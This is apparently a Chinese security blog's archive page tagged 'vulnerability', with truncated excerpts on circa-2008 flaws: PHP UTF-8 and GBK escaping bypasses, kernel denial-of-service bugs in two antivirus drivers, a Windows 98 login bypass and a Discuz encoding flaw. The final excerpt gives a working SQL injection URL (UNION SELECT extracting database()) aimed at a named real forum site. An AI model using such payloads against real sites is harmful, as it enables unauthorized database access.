标签 ‘漏洞’ 下的日志

php utf8 decode漏洞

来源:80sec

漏洞说明: php是一款被广泛使用的编程语言,可以被嵌套在html里用做web程序开发。但是在php里使用的某些编码函数在处理畸形的utf8序列时会产生不正确的结果,这样在某些情况下可能会引起应用程序的安全漏洞,绕过某些逻辑过滤等等。

漏洞成因:php在处理utf8编码时,对畸形的序列处理不当,如
阅读全文 »

Tags: , , ,

EQ魔法盾 4.0增强版(version:20080902及以下)多处内核拒绝服务漏洞

作者:MJ0011

EQ魔法盾的驱动程序员对用户态参数检查有一定概念,可惜没有正确理解ProbeForRead的用法,导致几乎所有的SSDT HOOK函数都存在用户态检查不正确的问题,漏洞多达数十处。

此漏洞可导致任意用户权限的程序可以在安装了EQ魔法盾的系统上引发蓝屏

出问题的组件:EQSysSecure.sys ,版本:2008.9.1.26 CheckSum = 0x0001EFD3 TimeStamp = 0x48BAC155

EQ魔法盾的驱动中有这样一个函数 :偏移608d处 sub_16c8d
阅读全文 »

Tags: ,

微点主动防御(version20080924及以下)多个拒绝服务漏洞之三

作者:MJ0011

继续爆三个漏洞,微点一直没反映啊~看来都度假去了 这样可不行啊 病毒木马可是不休假的哦 O(∩_∩)O哈哈~

(1).微点对NtWriteFile-> Call ObReferenceObjectByHandle的HOOK中未对参数做有效性检查,可导致任意权限用户在安装了微点的系统上可引发系统蓝屏

存在漏洞的文件:mp110011.sys,版本:1.2.10237,CheckSum = 0x0002291a , TimeStamp = 0x488944d9

微点hook了NtWriteFile-> Call ObReferenceObjectByHandle并对其中的FileHandle进行检查,检查对应的设备对象->驱动对象是否是Disk,如果是的话,判断写入的偏移,进行阻截或放行
阅读全文 »

Tags: ,

微点主动防御(version20080924及以下)多个拒绝服务漏洞之二

作者:MJ0011

国庆的早晨啊~再多爆料几个有问题的函数~~

参考文一:http://hi.baidu.com/mj0011/blog/item/e9bcc4390265fbf53a87ceb8.html

除了文一提到的两个函数~微点的内核驱动中实际存在着大量这样的问题

再提两个函数,也省得微点的工程师累死累活的找了~学习雷锋啊好榜样~~

(1). 对ZwDeleteValueKey 的HOOK函数对用户态参数没有做检查,导致任何权限用户在安装了微点的系统上可引发蓝屏

处理函数位于mp110009.sys, 版本:1.2.10045 ,CheckSum = 0xCC78 , TimeStamp = 0x48478FCF
阅读全文 »

Tags: ,

Windows 98 最新登录漏洞

鬼仔注:图片备用地址

来源:cnBeta

虽然Windows98使用的人数已经比Linux的桌面用户都要少了,但黑客们捉虫的工作依然在有条不紊地进行中.
一个类似于Windows 2000著名输入法漏洞的Win98登录漏洞刚刚出现,它同样是采用了hlp文件中调用的explorer实现.针对此漏洞,群众们纷纷表示影响不大.
阅读全文 »

Tags: ,

微点主动防御(version20080924及以下)多个拒绝服务漏洞及内核BUG

作者:MJ0011

国庆无聊在家,下了一个0924版的微点,从它的HOOK一个个看起,看了4个就发现两个有问题~~再看看,发现有问题的函数几乎是一半对一半~ 多达十几处。还只是简单看看地结果~太挫了

现在说一说其中两个~微点赶紧改吧:D

(1),驱动对ZwOpenEvent的HOOK存在拒绝服务安全漏洞,任何权限用户可以使安装了微点的系统蓝屏

问题在于微点的Hook驱动mp110013.sys对用户态调用ZwOpenEvent传入参数检查不充分导致的
阅读全文 »

Tags: ,

PHP字符编码绕过漏洞总结

作者:Safe3

其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。
该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过 addslashes() 转换后变为0xbf5c27,前面的0xbf5c是个有效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理,结果漏洞就触发了。

mysql_real_escape_string() 也存在相同的问题,只不过相比 addslashes() 它考虑到了用什么字符集来处理,因此可以用相应的字符集来处理字符。在MySQL 中有两种改变默认字符集的方法。
阅读全文 »

Tags: ,

DISCUZ字符转码漏洞

来源:凋凌玫瑰’s blog

最近出来的php第三方编码转换类漏洞又要死一大批php站了。
先是phpwind接着又是discuz论坛
编码转换没处理的都会存在这类漏洞了
phpwind的大家都知道了,今天群里还有人不知道discuz的。
顺便在群里看到个discuz论坛的站,发出来就都知道咋注了。
http://bbs.hefei.cc/space.php?username=%cf’%20UNION%20Select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*
我个人还是比较反对四处黑站的。

Tags: ,